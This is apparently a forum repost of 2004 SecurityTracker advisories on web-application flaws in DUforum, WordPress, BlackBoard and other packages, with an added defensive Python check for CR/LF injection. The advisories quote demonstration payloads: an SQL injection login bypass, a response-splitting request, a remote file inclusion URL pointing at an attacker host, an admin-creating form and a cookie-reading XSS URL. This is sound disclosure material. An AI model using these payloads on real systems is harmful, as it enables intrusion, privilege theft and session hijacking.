The Largest Vulnerability Encyclopedia
SecurityTracker Alert ID: 1011595
SecurityTracker URL: [link hidden by forum]
CVE Reference: GENERIC-MAP-NOMATCH (Links to External Site)
Date: Oct 11 2004
Impact: Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network
Exploit Included: Yes
Description: Soroush Dalili reported a vulnerability in DUforum. A remote user can inject SQL commands. A remote user can also conduct cross-site scripting attacks.
It is reported that the software does not properly validate user-supplied input. A remote user can supply a specially crafted request to execute SQL commands on the underlying database.
The 'login' form does not validate the 'password' variable. A remote user can exploit this to be authenticated to the system as an administrator. Demonstration exploit values are provided:
user= admin
password= ' or '1'='1
It is also reported that the 'FOR_ID' parameter in 'messages.asp' and the 'MSG_ID' parameter in 'messageDetail.asp' are affected. A demonstration exploit is provided:
[link hidden by forum] INJECT]
[link hidden by forum] INJECT]
It is also reported that the software does not filter HTML code from user-supplied input in messages. A remote user can submit a specially crafted message that, when viewed by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the DUforum software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
Impact: A remote user can inject SQL commands to be executed by the underlying database.
A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the DUforum software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
Solution: No solution was available at the time of this entry.
Vendor URL: [link hidden by forum] (Links to External Site)
Cause: Input validation error
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
Reported By: "Soroosh Dalili" <s-dalili@cc.sbu.ac.ir>
Message History: None.
WordPress Input Validation Holes Permit Response Splitting Attacks
SecurityTracker Alert ID: 1011592
SecurityTracker URL: [link hidden by forum]
CVE Reference: GENERIC-MAP-NOMATCH (Links to External Site)
Date: Oct 11 2004
Impact: Modification of system information, Modification of user information
Fix Available: Yes Exploit Included: Yes Vendor Confirmed: Yes
Version(s): 1.2
Description: An input validation vulnerability was reported in WordPress. A remote user can conduct response splitting attacks.
Chaotic Evil reported that the 'wp-login.php' script does not properly validate user-supplied input. A remote user can submit a specially crafted POST request to cause the target server to return a split response. A remote user can exploit this to spoof content on the target server, attempt to poison any intermediate web caches, or conduct cross-site scripting attacks.
A demonstration exploit HTTP POST request is provided:
POST /wp-login.php HTTP/1.0
Host: HOSTNAME
Content-Type: application/x-www-form-urlencoded
Content-length: 226
action=login&mode=profile&log=USER&pwd=PASS&text=
%0d%0aConnection:%20Keep-Alive%0d%0aContent-Length:%20
0%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Length:
% 2021%0d%0aContent-Type:%20text/html%0d%0a%0d%0a<html>
*defaced*</html>
The vendor was notified on September 24, 2004.
Impact: A remote user can create a URL that, when loaded by the target user, will cause arbitrary content to be displayed.
A remote user may be able to poison any intermediate web caches with arbitrary content.
Solution: The vendor has issued a fixed version (1.2.1), available at:
[link hidden by forum]
Vendor URL: [link hidden by forum] (Links to External Site)
Cause: Input validation error
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
Reported By: "Chaotic Evil" <chaoticevil@spyring.com>
Message History: None
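Added example (not part of the SecurityTracker advisory and not WordPress code): a defensive check in Python that URL-decodes a form body like the demonstration request above and flags parameters carrying CR, LF or NUL, together with a guard that refuses such values when a response header is built. The sample body is constructed, and the function names and the use of a Location header are assumptions made for illustration.

```python
from urllib.parse import parse_qsl, unquote

# Constructed sample modelled on the advisory's demonstration request
# (abbreviated; not captured traffic).
SAMPLE_BODY = (
    "action=login&mode=profile&log=USER&pwd=PASS&text="
    "%0d%0aConnection:%20Keep-Alive%0d%0aContent-Length:%200"
)

CONTROL_CHARS = ("\r", "\n", "\x00")


def _decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded CR/LF (%250d%250a) is seen too."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_crlf_params(body):
    """Return the names of form parameters whose decoded name or value
    contains CR, LF or NUL, in the order they appear in the body."""
    flagged = []
    for name, value in parse_qsl(body, keep_blank_values=True):
        text = _decode_fully(name) + _decode_fully(value)
        if any(c in text for c in CONTROL_CHARS):
            flagged.append(name)
    return flagged


def safe_header(name, value):
    """Build one response header line; reject anything that could end the
    header early and start a second header or a second response."""
    if any(c in name or c in value for c in CONTROL_CHARS):
        raise ValueError("control character in header field: %r" % name)
    return "%s: %s\r\n" % (name, value)


if __name__ == "__main__":
    print(find_crlf_params(SAMPLE_BODY))
    print(repr(safe_header("Location", "/wp-admin/")))
```

The first function suits request logging or a filter in front of the application; the second belongs at the point where user-influenced data reaches a response header, which is where the split happens.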
(Vendor Issues Fix) BlackBoard Internet Newsboard System Input Validation Flaws Let Remote Users Execute Arbitrary Commands
SecurityTracker Alert ID: 1011566
SecurityTracker URL: [link hidden by forum]
CVE Reference: GENERIC-MAP-NOMATCH (Links to External Site)
Date: Oct 7 2004
Impact: Disclosure of system information, Execution of arbitrary code via network, User access via network
Fix Available: Yes Vendor Confirmed: Yes
Version(s): 1.5.1; possibly prior versions
Description: Several vulnerabilities were reported in the BlackBoard Internet newsboard system. A remote user can execute arbitrary commands on the target system. A remote user can determine the installation path.
C-r-a-c-k love reported that the '/bb_lib/admin.inc.php' file does not properly validate user-supplied input. A remote user can submit a value for the $libpath variable to cause the target system to include and execute PHP code from a remote location. The code, including operating system commands, will run with the privileges of the target web service.
A demonstration exploit URL is provided:
[link hidden by forum] .inc.php?libpath=http://[attacker]/
It is also reported that a remote user can request the following type of URL to cause the system to generate an error message that discloses the installation path:
[link hidden by forum]
Other scripts are affected, including 'admin.inc.php' and 'cp.inc.php'.
Impact: A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
A remote user can determine the installation path.
Solution: The vendor issued a fixed version (Patch level 1.5.1-h) on October 6, 2004, available at:
[link hidden by forum]
The vendor's official announcement is available at:
[link hidden by forum]
Vendor URL: blackboard.unclassified.de/ (Links to External Site)
Cause: Input validation error, State error
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
Reported By: Yves Goergen <contact@unclassified.de>
Message History: This archive entry is a follow-up to the message listed below.
Oct 6 2004 BlackBoard Internet Newsboard System Input Validation Flaws Let Remote Users Execute Arbitrary Commands
BlackBoard Internet Newsboard System Input Validation Flaws Let Remote Users Execute Arbitrary Commands
SecurityTracker Alert ID: 1011551
SecurityTracker URL: [link hidden by forum]
CVE Reference: GENERIC-MAP-NOMATCH (Links to External Site)
Date: Oct 6 2004
Impact: Disclosure of system information, Execution of arbitrary code via network, User access via network
Exploit Included: Yes
Version(s): 1.5.1; possibly prior versions
Description: Several vulnerabilities were reported in the BlackBoard Internet newsboard system. A remote user can execute arbitrary commands on the target system. A remote user can determine the installation path.
C-r-a-c-k love reported that the '/bb_lib/admin.inc.php' file does not properly validate user-supplied input. A remote user can submit a value for the $libpath variable to cause the target system to include and execute PHP code from a remote location. The code, including operating system commands, will run with the privileges of the target web service.
A demonstration exploit URL is provided:
[link hidden by forum] .inc.php?libpath=http://[attacker]/
It is also reported that a remote user can request the following type of URL to cause the system to generate an error message that discloses the installation path:
[link hidden by forum]
Other scripts are affected, including 'admin.inc.php' and 'cp.inc.php'.
Impact: A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
A remote user can determine the installation path.
Solution: No solution was available at the time of this entry.
Vendor URL: blackboard.unclassified.de/ (Links to External Site)
Cause: Input validation error, State error
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
Reported By: Lin Xiaofeng <C-r-a-c-k[link hidden by forum]>
Message History: This archive entry has one or more follow-up message(s) listed below.
Oct 7 2004 (Vendor Issues Fix) BlackBoard Internet Newsboard System Input Validation Flaws Let Remote Users Execute Arbitrary Commands (Yves Goergen <contact@unclassified.de>)
The vendor has issued a fix
My Blog Input Validation Errors Let Remote Users Conduct Cross-Site Scripting Attacks
SecurityTracker Alert ID: 1011542
SecurityTracker URL: [link hidden by forum]
CVE Reference: GENERIC-MAP-NOMATCH (Links to External Site)
Date: Oct 5 2004
Impact: Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Fix Available: Yes Vendor Confirmed: Yes
Version(s): prior to 1.21
Description: An input validation vulnerability was reported in My Blog. A remote user can conduct cross-site scripting attacks.
The vendor reported that the software does not sufficiently validate user-supplied input and does not encode some HTML input.
A remote user can supply specially crafted input to potentially cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the My Blog software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
Impact: The impact was not specified, but is believed to allow a remote user to access the target user's cookies (including authentication cookies), if any, associated with the site running the My Blog software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
Solution: The vendor has released a fixed version (1.21), available at:
[link hidden by forum]
Vendor URL: [link hidden by forum] (Links to External Site)
Cause: Input validation error
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
PHPLinks Discloses Installation Path to Remote Users
SecurityTracker Alert ID: 1011537
SecurityTracker URL: [link hidden by forum]
CVE Reference: GENERIC-MAP-NOMATCH (Links to External Site)
Date: Oct 5 2004
Impact: Disclosure of system information
Exploit Included: Yes
Description: A vulnerability was reported in PHPLinks. A remote user can determine the installation path.
Nikyt0x Argentina reported that a remote user can request the following type of URL to cause the system to disclose the installation path:
[link hidden by forum]
Impact: A remote user can determine the installation path.
Solution: No solution was available at the time of this entry.
Vendor URL: phplinks.sourceforge.net/ (Links to External Site)
Cause: Access control error, Exception handling error
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
Reported By: Nikyt0x Argentina <nikyt0x@hotmail.com>
Message History: None
Silent Storm Portal Input Validation Errors Let Remote Users Gain Administrative Privileges and Conduct Cross-Site Scripting Attacks
SecurityTracker Alert ID: 1011470
SecurityTracker URL: [link hidden by forum]
CVE Reference: GENERIC-MAP-NOMATCH (Links to External Site)
Date: Sep 30 2004
Impact: Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of authentication information, Modification of user information, User access via network
Exploit Included: Yes
Version(s): 2.1, 2.2
Description: Some vulnerabilities were reported in Silent Storm Portal. A remote user can obtain administrative privileges on the target application. A remote user can also conduct cross-site scripting attacks.
CHT Security Research reported that 'profile.php' does not properly validate user-supplied input. A remote user can submit specially crafted input to inject data into the 'users.dat' file to create a new user account with administrative privileges.
A demonstration exploit form is provided:
<form method="post" action="http://www.victim.com/index.php?module=../../profile">
<input type="text" name="mail" value="any@mail.com"><br>
<input type="hidden" name="mail" value="<~>1<~>">
<input type="submit" name="post" value="Get Admin!">
</form>
It is also reported that the software does not filter HTML code from user-supplied input in the 'module' parameter. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the Silent Storm Portal software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
A demonstration exploit URL is provided:
[link hidden by forum] lert%28document.cookie%29;%3C/script%3E
The original advisory is available at:
[link hidden by forum]
Impact: A remote user can obtain administrative privileges on the target application.
A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the Silent Storm Portal software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
Solution: No solution was available at the time of this entry.
Vendor URL: [link hidden by forum] (Links to External Site)
Cause: Input validation error
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
Reported By: R00tCr4ck <root@cyberspy.org>
Message History: None